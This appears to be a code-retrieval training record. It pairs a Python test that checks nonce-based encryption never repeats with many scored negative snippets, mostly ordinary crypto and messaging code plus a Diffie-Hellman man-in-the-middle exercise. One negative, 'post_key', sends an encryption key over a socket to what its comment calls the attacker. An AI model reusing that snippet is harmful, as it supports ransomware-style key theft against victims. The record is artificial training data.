config.configparser.Error:\n if default is not None:\n return default\n raise", "def TeXKey(self, default=None):\n return self.data.get('texkey', default)", "def load_key():", "def setdefault(self, key: str, default: Any = None) -> Any:\n try:\n return self[key]\n except KeyError:\n self[key] = default\n return self[key]", "def get(self, metakey, default=None):\n if metakey in self:\n return self[metakey]\n return default", "def get_default_access_key_id():\n access_key_id_script = AWS_ACCOUNTS['default'].ACCESS_KEY_ID_SCRIPT.get()\n return access_key_id_script or get_s3a_access_key()", "def getcfg(self, key, 
default=None):\n return self._config.get(key, default)", "def get(self, key, default=None):\n try:\n return self.__getitem__(key)\n except ValueError:\n if default is not None:\n return default\n else:\n raise", "def get(self, key, default=None):\n return self.metadata_dict.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get(self, key, default=None):\n return self.data.get(key, default)", "def get_from_environ(key: str, default: Any = None) -> str:\n return os.environ.get(key, default)" ]
[ "0.7820905", "0.76434904", "0.7315344", "0.7273974", "0.7266542", "0.7164663", "0.708993", "0.7069916", "0.7067126", "0.70258087", "0.70121825", "0.69252306", "0.686531", "0.6851818", "0.6849022", "0.6843253", "0.678574", "0.6693812", "0.66881984", "0.664332", "0.6612321", "0.6610823", "0.6604265", "0.65919226", "0.65308213", "0.6520606", "0.65183884", "0.65071595", "0.6506874", "0.6498181", "0.6491904", "0.6483908", "0.64564943", "0.6451418", "0.6442761", "0.64354736", "0.64316875", "0.6429961", "0.64269054", "0.6421008", "0.6418649", "0.64052576", "0.64047796", "0.639343", "0.63873017", "0.63833815", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.63527155", "0.6350485", "0.63468194", "0.63334274", "0.63232225", "0.63205796", "0.63046205", "0.6303444", "0.6299824", "0.6281038", "0.6248287", "0.6246647", "0.6237095", "0.62338537", "0.6232617", "0.619575", "0.61891294", "0.6182222", "0.61795634", "0.6178773", "0.61645335", "0.6162935", "0.61598754", "0.61508507", "0.6146326", "0.61368436", "0.61368436", "0.6136821" ]
0.0
-1
It does not produce the same message using the same key.
def test_encrypt_nonce(self):
    key = b'0' * 32
    message = 'message'

    assert encrypt(message, key=key) != encrypt(message, key=key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def create_key(message, key):\n if len(key) > len(message):\n return key[0:len(message)]\n new_key = key * int(len(message)/len(key))\n new_key += key[0:len(message) - len(new_key)]\n return new_key", "def unique_by_key(self, check_message: Optional[str]) -> Tuple[str, ...]:\n return (check_message or self.message,)", "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def test_key_type(self):\n self.failureResultOf(self.producer.send_messages(\"topic\", key=\"key\", msgs=[b\"msg\"]), TypeError)", "def _newKey(self, key):\n pass", "def test_duplicate_key_identifier(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=list(bundle.keys)[0].key_identifier,\n key_tag=4711,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(ValueError):\n validate_signatures(bundle)", "def __init__(self, output_key: bytes, input_key: bytes) -> None:\n super().__init__(output_key, input_key)\n self.send_seqno = randrange(0x100000000, 0x1FFFFFFFF)", "def genKey(self, otherKey):\n self.sharedSecret = self.genSecret(self.privateKey, otherKey)\n #print(\"Shared secret:\")\n #print(self.sharedSecret)\n s = hashlib.sha256()\n s.update(bytes(str(self.sharedSecret).encode()))\n self.key = s.digest()", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def main():\n\n prime = 0xffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca237327ffffffffffffffff\n base = 2\n \n connection = diffiehellman_mitm_sim(prime, base)\n\n # intercept alices public key\n prime, base , _ = next(connection)\n\n # send prime instead of alices public key to bob. Recieve Bobs public key, \n # which we forget as it is not needs. The shared kill will be 0.\n\n connection.send((prime, base, prime))\n\n #Send prime as bob's public key to alice. We have ensured that the shared\n #hared secret key is 0. 
Recieve Alice's ciphertext for bob\n ciphertext_a2b = connection.send(prime)\n\n # decrypt\n malcolm = AES_CBC(SHA1(bso.int_to_bytes(0)).digest()[:16], b'0'*16)\n messages = []\n messages.append(bso.remove_padding_pkcs7(malcolm.decrypt(ciphertext_a2b[:-16], ciphertext_a2b[-16:])))\n\n #Send the ciphertext to bob. Recieve his response\n ciphertext_b2a = connection.send(ciphertext_a2b)\n\n messages.append(bso.remove_padding_pkcs7(malcolm.decrypt(ciphertext_b2a[:-16], ciphertext_b2a[-16:])))\n\n assert messages[0] == b'Message to Bob'\n assert messages[1] == b'Message to Alice'\n\n \n return", "def repeating_key_xor(msg_b, key_b):\n l = len(key_b)\n return bytes(key_b[n % l] ^ c_i for n, c_i in enumerate(msg_b))", "def _eq_key(self):\n return super(UpdateMessage, self)._eq_key + (self.previous_payload,)", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def message_for_key(self, key, context):\n raise NotImplementedError('message_for_key() should have been replaced by a metaclass')", "def generate_key():\n # generate random key\n key = get_random_string()\n\n # if it's already taken, generate another\n if EmailManager.objects.filter(key=key).exists():\n return EmailManager.generate_key()\n\n # return it\n return key", "def shared_key(private_key,public_key):\n\treturn private_key.exchange(public_key)", "def test_producer_send_messages_keyed_same_partition(self):\n first_part = 43\n second_part = 55\n client = Mock(reactor=MemoryReactorClock())\n client._api_versions = 0\n ret1 = Deferred()\n client.send_produce_request.side_effect = [ret1]\n client.topic_partitions = {self.topic: [first_part, second_part]}\n client.metadata_error_for_topic.return_value = False\n msgs1 = [self.msg(\"one\"), self.msg(\"two\")]\n msgs2 = [self.msg(\"odd_man_out\")]\n msgs3 = [self.msg(\"three\"), self.msg(\"four\")]\n key1 = b\"99\"\n key3 = b\"foo\"\n ack_timeout = 5\n\n # Even though we're sending keyed messages, we use the default\n # round-robin partitioner, since the requests are easier to predict\n producer = Producer(client, ack_timeout=ack_timeout, batch_send=True, batch_every_n=4)\n d1 = producer.send_messages(self.topic, key=key1, msgs=msgs1)\n d2 = producer.send_messages(self.topic, msgs=msgs2)\n d3 = producer.send_messages(self.topic, key=key3, msgs=msgs3)\n # Check the expected request was sent\n msgSet1 = create_message_set(\n [\n make_send_requests(msgs1, key=key1)[0],\n make_send_requests(msgs3, key=key3)[0],\n ],\n producer.codec,\n )\n msgSet2 = create_message_set(make_send_requests(msgs2), producer.codec)\n req1 = ProduceRequest(self.topic, first_part, msgSet1)\n req2 = ProduceRequest(self.topic, second_part, msgSet2)\n # Annoying, but order of requests is indeterminate...\n client.send_produce_request.assert_called_once_with(\n ANY, acks=producer.req_acks, timeout=ack_timeout, fail_on_error=False\n )\n self.assertEqual(sorted([req1, req2]), sorted(client.send_produce_request.call_args[0][0]))\n # Check results when \"response\" fires\n self.assertNoResult(d1)\n self.assertNoResult(d2)\n self.assertNoResult(d3)\n resp = [\n ProduceResponse(self.topic, first_part, 0, 10),\n ProduceResponse(self.topic, second_part, 0, 23),\n ]\n ret1.callback(resp)\n result = self.successResultOf(d1)\n self.assertEqual(result, resp[0])\n result = self.successResultOf(d2)\n self.assertEqual(result, resp[1])\n result = self.successResultOf(d3)\n self.assertEqual(result, resp[0])\n producer.stop()", 
"def generate_keystream(self):", "def test_producer_send_messages_keyed(self):\n first_part = 43\n second_part = 56\n client = Mock(reactor=MemoryReactorClock())\n client._api_versions = 0\n ret1 = Deferred()\n client.send_produce_request.side_effect = [ret1]\n client.topic_partitions = {self.topic: [first_part, second_part, 102]}\n client.metadata_error_for_topic.return_value = False\n msgs1 = [self.msg(\"one\"), self.msg(\"two\")]\n msgs2 = [self.msg(\"three\"), self.msg(\"four\")]\n key1 = b\"35\"\n key2 = b\"foo\"\n ack_timeout = 5\n\n # Even though we're sending keyed messages, we use the default\n # round-robin partitioner, since the requests are easier to predict\n producer = Producer(client, ack_timeout=ack_timeout, batch_send=True, batch_every_n=4)\n d1 = producer.send_messages(self.topic, key=key1, msgs=msgs1)\n d2 = producer.send_messages(self.topic, key=key2, msgs=msgs2)\n # Check the expected request was sent\n msgSet1 = create_message_set(make_send_requests(msgs1, key=key1), producer.codec)\n msgSet2 = create_message_set(make_send_requests(msgs2, key=key2), producer.codec)\n req1 = ProduceRequest(self.topic, first_part, msgSet1)\n req2 = ProduceRequest(self.topic, second_part, msgSet2)\n # Annoying, but order of requests is indeterminate...\n client.send_produce_request.assert_called_once_with(\n ANY, acks=producer.req_acks, timeout=ack_timeout, fail_on_error=False\n )\n self.assertEqual(sorted([req1, req2]), sorted(client.send_produce_request.call_args[0][0]))\n # Check results when \"response\" fires\n self.assertNoResult(d1)\n self.assertNoResult(d2)\n resp = [\n ProduceResponse(self.topic, first_part, 0, 10),\n ProduceResponse(self.topic, second_part, 0, 23),\n ]\n ret1.callback(resp)\n result = self.successResultOf(d1)\n self.assertEqual(result, resp[0])\n result = self.successResultOf(d2)\n self.assertEqual(result, resp[1])\n producer.stop()", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def testStreamKeying1(self):\n\n yield self.connect(self.get_body_node(connect=True, useKey=True))\n yield self.proxy.send(self.get_body_node(useKey=True))\n yield self.proxy.send(self.get_body_node(useKey=True))", "def newKeyGenerate():\n generate()\n return '', 204", "def test_get(self):\n key = self.key_gen.get()\n key2 = self.key_gen.get()\n\n self.assertEqual(key, key2 - 1)", "def create_key ():", "def recipient_public_key(self):", "def main():\n # key = random(1024)\n # ciphertexts = [encrypt(key, msg) for msg in MSGS]\n\n # Get key and secret message\n knownPlain2 = \"The nice thing about Keeyloq is now we cryptographers can drive a lot of fancy cars - Dan Boneh\"\n key = strxor(ciphertexts[2], knownPlain2)\n secret = strxor(target, key)\n\n print \"Key: \" + key\n print \"Key (Hex): \" + key.encode(\"hex\")\n print \"Secret: \" + secret", "def keyEquivalent( self ):\n\t\treturn None", "def messagetokeystring(message, keydict):\r\n return ''.join([' ' + str(keydict[char])\r\n if i - 1 >= 0\r\n and str(keydict[char])[0]\r\n == str(keydict[message[i - 1]])[0]\r\n else str(keydict[char])\r\n for i, char in enumerate(message)])", "def receive_key(self, key):\n try:\n self.queue.put(key)\n except:\n raise #Just collecting possible exceptions for now", "def key():", "def receive_key(self, key):\n self.queue.put(key)", "def encrypt_message(message,public_key,symetric_key):\n\tif message != None:\n\t\tnonce = os.urandom(12)\n\t\tmessage = 
AESCCM(symetric_key).encrypt(nonce,message.encode(\"iso-8859-1\"),None)\n\t\tnonce, *_ = encrypt(public_key,nonce)\n\t\tmessage ={'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\n\treturn message", "def __init__(self, encoded_message, key):\n self.encoded_message = encoded_message\n self.key = key", "def testCryptMessageRoundtrip(self):\n try:\n cu = CryptUtils()\n ky = cu.newKey()\n msg = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\\n\"\n encMsg = cu.encryptMessage(msg, ky)\n dcrMsg = cu.decryptMessage(encMsg, ky)\n self.assertEqual(msg, dcrMsg)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def add_message(messages, key, message):\n if key in messages:\n messages[key].append(message)\n else:\n messages[key] = [message]", "def __hash__(self):\n return hash(str(self.key))", "def __hash__(self):\n return hash(str(self.key))", "def generate_key(row: int, message: bitarray, offset: int):\n row = \"R\" + str(row)\n length = \"L\" + str(len(message))\n offset = \"O\" + str(offset)\n key = []\n key.extend([row, length, offset])\n random.shuffle(key)\n print(f\"Key: {''.join(key)}\")", "def dh_encrypt(pub, message):\n \n Group, private, public = dh_get_key()#generate new DH pair for Alice\n #private key is an integer/scalar and public key is a point on the curve \n \n #check whether public key of Bob is valid and on curve \n assert Group.check_point(pub)\n \n #Alice obtains shared secret by multiplying her private key with bob's forwarded public key\n key = pub.pt_mul(private)#dA* qB\n print \"key from enc is\", key\n \n hashedKey=sha256(key.export()).digest()\n\n \n plaintext = message.encode(\"utf8\")#encode message\n aes = Cipher(\"aes-128-gcm\")#select cipher\n iv = urandom(16)#generate initialization vector \n cipher, tag = aes.quick_gcm_enc(hashedKey[:16], iv, plaintext)#encrypt using shared key \n ciphertext = [iv,cipher,tag,public]\n\n return ciphertext", "def _fake_message_compare(m1, m2):\r\n m1 = m1.serialize()\r\n m2 = m2.serialize()\r\n diff = False\r\n for i in range(len(m1)):\r\n if m1[i] is None:\r\n continue\r\n if m1[i] != m2[i]:\r\n diff = True\r\n break\r\n return not diff", "def _get_raw_key(self, key_id):", "def _deduplicate_message(self, message):\n\n key = (message.remote, message.mid)\n if key in self._recent_messages:\n if message.mtype is CON:\n if self._recent_messages[key] is not None:\n self.log.info('Duplicate CON received, sending old response again')\n # not going via send_message because that would strip the\n # mid and might do all other sorts of checks\n self._send_initially(self._recent_messages[key])\n else:\n self.log.info('Duplicate CON received, no response to send yet')\n else:\n self.log.info('Duplicate NON, ACK or RST received')\n return True\n else:\n self.log.debug('New unique message received')\n self.loop.call_later(message.transport_tuning.EXCHANGE_LIFETIME, functools.partial(self._recent_messages.pop, key))\n self._recent_messages[key] = None\n return False", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def __init__(self, key, msg0503):\n enkey1 = map(ord, AES.new(key).encrypt(msg0503[:16]))\n self.cipher = AES.new(\"\".join(\n map(chr, (enkey1[i] ^ ord(msg0503[i + 16]) for i in range(16)))))\n self.encrypt_seq = random.randint(0, 0xffff)", "def test_envelope_echoed_back(self):\n addr_1 = self.connection_client_1.address\n addr_2 = 
self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n original_envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(original_envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=10)\n assert delivered_envelope is not None\n\n delivered_envelope.to = addr_1\n delivered_envelope.sender = addr_2\n\n self.multiplexer_client_2.put(delivered_envelope)\n echoed_envelope = self.multiplexer_client_1.get(block=True, timeout=5)\n\n assert echoed_envelope is not None\n assert echoed_envelope.to == original_envelope.sender\n assert delivered_envelope.sender == original_envelope.to\n assert (\n delivered_envelope.protocol_specification_id\n == original_envelope.protocol_specification_id\n )\n assert delivered_envelope.message == original_envelope.message", "def test_envelope_echoed_back(self):\n addr_1 = self.connection_client_1.address\n addr_2 = self.connection_client_2.address\n\n msg = DefaultMessage(\n dialogue_reference=(\"\", \"\"),\n message_id=1,\n target=0,\n performative=DefaultMessage.Performative.BYTES,\n content=b\"hello\",\n )\n original_envelope = Envelope(\n to=addr_2,\n sender=addr_1,\n protocol_specification_id=DefaultMessage.protocol_specification_id,\n message=DefaultSerializer().encode(msg),\n )\n\n self.multiplexer_client_1.put(original_envelope)\n delivered_envelope = self.multiplexer_client_2.get(block=True, timeout=10)\n assert delivered_envelope is not None\n\n delivered_envelope.to = addr_1\n delivered_envelope.sender = addr_2\n\n self.multiplexer_client_2.put(delivered_envelope)\n echoed_envelope = self.multiplexer_client_1.get(block=True, timeout=5)\n\n assert echoed_envelope is not None\n assert echoed_envelope.to == original_envelope.sender\n assert delivered_envelope.sender == original_envelope.to\n assert (\n delivered_envelope.protocol_specification_id\n == original_envelope.protocol_specification_id\n )\n assert delivered_envelope.message == original_envelope.message", "def key():\n pass", "def key():\n pass", "async def test_preserved_other_overwrites_text(self):\n prev_overwrite_dict = dict(self.text_overwrite)\n await self.cog._set_silence_overwrites(self.text_channel)\n new_overwrite_dict = dict(self.text_overwrite)\n\n # Remove related permission keys because they were changed by the method.\n for perm_name in (\n \"send_messages\",\n \"add_reactions\",\n \"create_private_threads\",\n \"create_public_threads\",\n \"send_messages_in_threads\"\n ):\n del prev_overwrite_dict[perm_name]\n del new_overwrite_dict[perm_name]\n\n self.assertDictEqual(prev_overwrite_dict, new_overwrite_dict)", "def encodeMessage(self, key, message):\n # Make sure pure ascii, and replace bullshit\n message = message.encode('ascii', 'replace')\n # Any message needs to be a multiple of 8.\n dsize = len(message)\n #message = struct.pack('!q', int(binascii.crc32(message)& 0xffffffff)) + struct.pack('!q', dsize) + message\n # Encode two dsize parity blocks and check them against eachother on the receiving end\n message = struct.pack('!q', dsize) + struct.pack('!q', dsize) + message\n key = self.createKey(key)\n short = (math.ceil(len(message)/8.0) * 8) - len(message)\n space = \"\\x00\" * int(short)\n enc = DES.new(key, DES.MODE_ECB)\n return enc.encrypt(message+space)", "def 
generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "def testGetSquashNoKeyOverlap(self):\n\n # Assuming proxy's downstream_max is 1,\n # and number of threads is 1.\n\n self.client_connect(0)\n self.client_connect(1)\n self.client_connect(2)\n\n self.client_send('get cork0\\r\\n', 0)\n self.mock_recv('get cork0\\r\\n', 0)\n\n # Mock server is 'busy' at this point, so\n # any client sends should be able to be\n # de-duplicated by the proxy.\n\n self.client_send('get a\\r\\n', 1)\n self.client_send('get x\\r\\n', 2)\n\n self.wait(10)\n\n self.mock_send('END\\r\\n', 0)\n self.client_recv('END\\r\\n', 0)\n\n self.mock_recv('get a x\\r\\n', 0)\n self.mock_send('VALUE a 0 1\\r\\na\\r\\n', 0)\n self.mock_send('VALUE x 0 1\\r\\nx\\r\\n', 0)\n self.mock_send('END\\r\\n', 0)\n\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 1)\n self.client_recv('VALUE x 0 1\\r\\nx\\r\\n' +\n 'END\\r\\n', 2)", "def hash_code(sender: Key.__class__, **kwargs):\n new_key = kwargs['instance']\n new_key.code = randint(MIN_CODE, MAX_CODE)\n new_key.hash_code = sha1(str(new_key.code).encode('utf-8')).hexdigest()", "def _eq_key(self):\n return (\n self.message_type,\n self.topic,\n self.schema_id,\n self.payload,\n self.uuid,\n self.timestamp,\n self.upstream_position_info,\n self.kafka_position_info,\n self.dry_run,\n self.encryption_type\n )", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def problem1(bob, message):\n \"\"\"\n 1. Generate a sufficiently large random key; the key must be at least 5\n times the length of the message and on average half of bobs guess\n filters will be wrong\n 2. Get the filters bob used by using bob.quantum_channel(data)\n 3. Create the list of correct filters sent and figure out which filters\n Bob used correctly\n 4. Tell Bob which filters he guessed incorrectly and should remove\n 5. Create the key and to make sure it's >= 5*len(message) and shorten the\n key to 5*len(message) if it is currently longer\n 6. Call otp_encrypt(key, message) to encrypt the message and then use\n bob.message(ciphertext) to send Bob the coded message\n \"\"\"\n # raise NotImplemented(\"TODO\")\n \n #1. Generates a key of length: messageLen * a value between 15 and 31.0\n messageLen = len(message)\n allPhotons = []\n allFilters = []\n correctPhotons = 0\n\n while correctPhotons < messageLen*5:\n\n photons = generatePhotons(messageLen)\n #2. \n bobFilters = bob.quantum_channel(photons)\n \n allFilters += bobFilters\n allPhotons += photons\n\n #3.\n disposalInstructions, correctPhotons = validateFilters(allPhotons, allFilters)\n \n if correctPhotons >= messageLen*5:\n\n #4. \n bob.dispose(disposalInstructions)\n #5. \n key = getKey(allPhotons, disposalInstructions, messageLen)\n\n #6. \n ciphertext = otp_encrypt(key, message)\n bob.message(ciphertext)", "def _get_sender_key(self, outer_message, aad, plaintext, request_id):\n return self.sender_key", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def diffiehellman_mitm_sim(prime, base):\n alice = {}\n\n #Alice generates their public key an sends to 'bob'\n alice['dh'] = DiffieHellman(prime, base, secret_key=secrets.randbelow(prime))\n alice_pub = alice['dh'].gen_public_key()\n\n (prime, base, key_for_bob) = yield (prime, base, alice_pub)\n\n \n\n #bob recieves 'alice's' public key, generates their own public key and\n #the shared key. 
Sends their public key ot 'alice'\n bob = {'dh':DiffieHellman(prime, base, secret_key=secrets.randbelow(prime))}\n bob_pup = bob['dh'].gen_public_key()\n bob['dh'].gen_shared_key(key_for_bob)\n\n key_for_alice = yield bob_pup\n\n ### Alice recieves Bob's public key, generates the shared key and encrypts\n ### message for bob\n\n alice['dh'].gen_shared_key(key_for_alice)\n \n alice['sha1'] = SHA1(bso.int_to_bytes(alice['dh'].shared_key))\n alice['cipher'] = AES_CBC(alice['sha1'].digest()[:16], secrets.token_bytes(16))\n alice_ciphertext = alice['cipher'].encrypt(b'Message to Bob')\n alice_ciphertext += alice['cipher'].IV\n\n ciphertext_for_bob = yield alice_ciphertext\n \n #Bob recieves the ciphertext, decrypts it and send a reply.\n\n bob['sha1'] = SHA1(bso.int_to_bytes(bob['dh'].shared_key))\n bob['cipher'] = AES_CBC(bob['sha1'].digest()[:16], secrets.token_bytes(16))\n bob_ciphertext = bob['cipher'].encrypt(b'Message to Alice')\n bob_ciphertext += bob['cipher'].IV\n\n ciphertext_for_alice = yield bob_ciphertext\n\n ### Finally alice decrypts bobs reply\n\n alice['cipher'].decrypt(ciphertext_for_alice[:-16], ciphertext_for_alice[-16:])", "def testGetSquashOneKey(self):\n\n # Assuming proxy's downstream_max is 1,\n # and number of threads is 1.\n\n self.client_connect(0)\n self.client_connect(1)\n self.client_connect(2)\n self.client_connect(3)\n self.client_connect(4)\n\n self.client_send('get wait0\\r\\n', 0)\n self.mock_recv('get wait0\\r\\n', 0)\n\n # Mock server is 'busy' at this point, so\n # any client sends should be able to be\n # de-duplicated by the proxy.\n\n self.client_send('get a\\r\\n', 1)\n self.client_send('get a\\r\\n', 2)\n self.client_send('get a\\r\\n', 3)\n self.client_send('get a\\r\\n', 4)\n\n self.wait(10)\n\n self.mock_send('END\\r\\n', 0)\n self.client_recv('END\\r\\n', 0)\n\n self.mock_recv('get a\\r\\n', 0)\n self.mock_send('VALUE a 0 1\\r\\na\\r\\n', 0)\n self.mock_send('END\\r\\n', 0)\n\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 1)\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 2)\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 3)\n self.client_recv('VALUE a 0 1\\r\\na\\r\\n' +\n 'END\\r\\n', 4)", "def setup_key_decrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(\"Please enter the key that was used to encrypt your message.--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key.\")\t\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def _hmac(self, key, msg):\n return hmac.new(key, msg, digestmod=self.hashfunc).digest()", "def _GetKeyString(self):", "def _GetKeyString(self):", "def generate_key():\r\n\t\treturn ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in range(123))", "def get_keys(self, update, context):\r\n self.SECRET_KEY = update.message.text\r\n update.message.reply_text(text=f'Новый ключ: {self.SECRET_KEY}')\r\n return ConversationHandler.END", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. 
--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def testKeyMismatch(self):\n encrypted_data = self.encrypt_wrapper.read(1024 * 1024 * 100)\n\n wrong_key = crypto.RSAPrivateKey().GenerateKey()\n decrypt_wrapper = uploads.DecryptStream(\n readers_private_key=self.readers_private_key,\n writers_public_key=wrong_key.GetPublicKey(),\n outfd=self.outfd)\n\n # We should know after very few bytes that the key is wrong. The\n # first encrypted chunk is the serialized signature which is 518\n # bytes in the test. Adding crypto headers gives a chunk size of\n # 570. After 600 bytes we should definitely bail out.\n with self.assertRaises(crypto.VerificationError):\n decrypt_wrapper.write(encrypted_data[:600])", "def test_previously_sent_message_not_sent_twice(self):\n thread = self.create_thread()\n message = thread.first_message\n message.sent = True\n message.save()\n\n send_message(message.pk)\n\n self.assertFalse(self.groupnotify_mock.called)", "def _is_duplicate_sync_message(self, message):\n community = message.community\n # fetch the duplicate binary packet from the database\n try:\n have_packet, undone = self._database.execute(u\"SELECT packet, undone FROM sync WHERE community = ? AND member = ? AND global_time = ?\",\n (community.database_id, message.authentication.member.database_id, message.distribution.global_time)).next()\n except StopIteration:\n if __debug__: dprint(\"this message is not a duplicate\")\n return False\n\n else:\n have_packet = str(have_packet)\n if __debug__:\n if isinstance(message.distribution, FullSyncDistribution) and message.distribution.enable_sequence_number:\n seq = \" #%d\" % message.distribution.sequence_number\n else:\n seq = \"\"\n if have_packet == message.packet:\n # exact binary duplicate, do NOT process the message\n if __debug__:\n dprint(message.candidate, \" received identical message [\", message.name, \" \", message.authentication.member.database_id, \"@\", message.distribution.global_time, seq, \" undone\" if undone else \"\", \"]\", level=\"warning\")\n\n if undone:\n try:\n proof, = self._database.execute(u\"SELECT packet FROM sync WHERE id = ?\", (undone,)).next()\n except StopIteration:\n pass\n else:\n self._statistics.dict_inc(self._statistics.outgoing, u\"-duplicate-undo-\")\n self._endpoint.send([message.candidate], [str(proof)])\n\n else:\n signature_length = message.authentication.member.signature_length\n if have_packet[:signature_length] == message.packet[:signature_length]:\n # the message payload is binary unique (only the signature is different)\n if __debug__:\n seq = \" #%d\" % message.distribution.sequence_number\n dprint(message.candidate, \" received identical message with different signature [member:\", message.authentication.member.database_id, \"; @\", message.distribution.global_time, seq, \"]\", level=\"warning\")\n\n if have_packet < message.packet:\n # replace our current message with the other one\n self._database.execute(u\"UPDATE sync SET packet = ? WHERE community = ? AND member = ? 
AND global_time = ?\",\n (buffer(message.packet), community.database_id, message.authentication.member.database_id, message.distribution.global_time))\n\n # notify that global times have changed\n # community.update_sync_range(message.meta, [message.distribution.global_time])\n\n else:\n if __debug__: dprint(message.candidate, \" received message with duplicate community/member/global-time triplet. possibly malicious behavior\", level=\"warning\")\n\n # this message is a duplicate\n return True", "def text(message):\n room = session.get('room')\n key = os.urandom(32)\n iv = os.urandom(16)\n print(key,iv)\n\n print(key[:2],key[:4])\n print(len(key),len(iv))\n print(type(key))\n data = 'hello world 1234' # <- 16 bytes\n\n enc = aes_encrypt(key,data,iv)\n dec = aes_decrypt(key,enc,iv)\n\n print('data:',data)\n print('cipher:', enc)\n print('plain:',dec)\n test = os.urandom(2)\n print('key:', int.from_bytes(test, byteorder='little'))\n print('key', test)\n \n emit('enc_msg', {'key': key.hex(),\n 'cipher': enc.hex(),\n 'iv' : iv.hex(),\n }, room=room)\n emit('message', {'msg': session.get('name') + ':' + message['msg']}, room=room)", "def __PRGA(self, message: bytearray) -> bytearray:\n j = 0\n enc = message.copy()\n key = self.__S.copy()\n for idx in range(len(message)):\n # get i and j\n i = (idx+1) % 256\n j = (j + key[i]) % 256\n # swap i and j\n tmp = key[i]\n key[i] = key[j]\n key[j] = tmp\n # 